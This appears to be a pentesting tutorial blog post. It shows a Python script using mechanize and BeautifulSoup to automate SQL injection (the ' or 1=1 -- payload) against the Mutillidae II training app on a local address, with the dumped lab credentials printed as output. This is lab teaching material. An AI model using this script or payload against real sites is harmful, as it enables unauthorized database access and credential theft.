Automate SQL-injection with mechanize and beautifulsoup in python

Python is a great tool to automate things and make things easier for you. Here I am going to show how to automate SQL-injection using Mechanize and BeautifulSoup Python packages. The target I am taking is Mutillidae II. The link in my case is http://192.168.178.25/mutillidae/index.php?page=user-info.php. You may have a different local IP address.

! /usr/bin/python
 pip install mechanize
 pip install beautifulsoup4
 import mechanize,urllib,sys
 from bs4 import BeautifulSoup
 br = mechanize.Browser()
 br.open(sys.argv[1]) #give vulnerable link on command line
 br.select_form(nr=0) #select the first form
 br.form[\'username\']= "\' or 1=1 -- " #inject our payload to the username field
 br.submit()  #Submit the form
 resp_html = br.response().read() #read the response 
 soup = BeautifulSoup(resp_html,\'lxml\') #parse the html code with lxml parser
 data_list=[]  # create empty list 
 for item in soup.find_all(\'span\'): # iterate upon span tags and get there text values  data_list.append(item.get_text())
 data_list = data_list[12:] #we are not interested in data list upto index 11 
 Count = 0
 for item in data_list:   # modify the data list to look pretty
     Count += 1
     print item,
     if Count%6 == 0:
     print ""

In terminal run the python script with vulnerable link.

python script_name.py http://192.168.178.25/mutillidae/index.php?page=user-info.php

To understand better you have to see the source code of vulnerable code before and after the injection happens.

OutPut is:

Username= admin Password= admin Signature= g0t r00t?
 Username= adrian Password= somepassword Signature= Zombie Films Rock!
 Username= john Password= monkey Signature= I like the smell of confunk
 Username= jeremy Password= password Signature= d1373 1337 speak
 Username= bryce Password= password Signature= I Love SANS
 Username= samurai Password= samurai Signature= Carving fools
 Username= jim Password= password Signature= Rome is burning
 Username= bobby Password= password Signature= Hank is my dad
 Username= simba Password= password Signature= I am a super-cat
 Username= dreveil Password= password Signature= Preparation H
 Username= scotty Password= password Signature= Scotty do
 Username= cal Password= password Signature= C-A-T-S Cats Cats Cats
 Username= john Password= password Signature= Do the Duggie!
 Username= kevin Password= 42 Signature= Doug Adams rocks
 Username= dave Password= set Signature= Bet on S.E.T. FTW
 Username= patches Password= tortoise Signature= meow
 Username= rocky Password= stripes Signature= treats?
 Username= tim Password= lanmaster53 Signature= Because reconnaissance is hard to spell
 Username= ABaker Password= SoSecret Signature= Muffin tops only
 Username= PPan Password= NotTelling Signature= Where is Tinker?
 Username= CHook Password= JollyRoger Signature= Gator-hater
 Username= james Password= i<3devs Signature= Occupation: Researcher
 Username= user Password= user Signature= User Account
 Username= ed Password= pentest Signature= Commandline KungFu anyone?

Data for Noobs like me:

Install Mechanize and BeautifulSoup Python packages. Import the required libraries. Then request to open the vulnerable link, find the form and inject the payload into the username field and then submit the form.

The link after submission looks like this “http://192.168.178.25/mutillidae/index.php?page=user-info.php&username=%27+or+1%3D1+–+&password=&user-info-php-submit-button=View+Account+Details

Fetch the response into resp_html variable and parse it into lxml parser. Then with the help of BeautifulSoup find the <span> tags (that is where our data lies). There are multiple ways to get this data, it all depends on your thinking. Maybe my way is longer than what you can think.\r\n\r\nFirst for loop to iterate on the list of span tags to get text data. After that, I prune out first 11 elements of the list, as they are not of our interest (see the source code of page after injection). Second loop is to make data look more fancy.\r\n\r\nThe things we can do with this are limitless, we can use automation to check XSS, SQL injection, and all other beautiful attacks that we use in Web app pentesting. That\’s it Thank You for reading.’, ‘Automate SQL-injection with Mechanize and BeautifulSoup in Python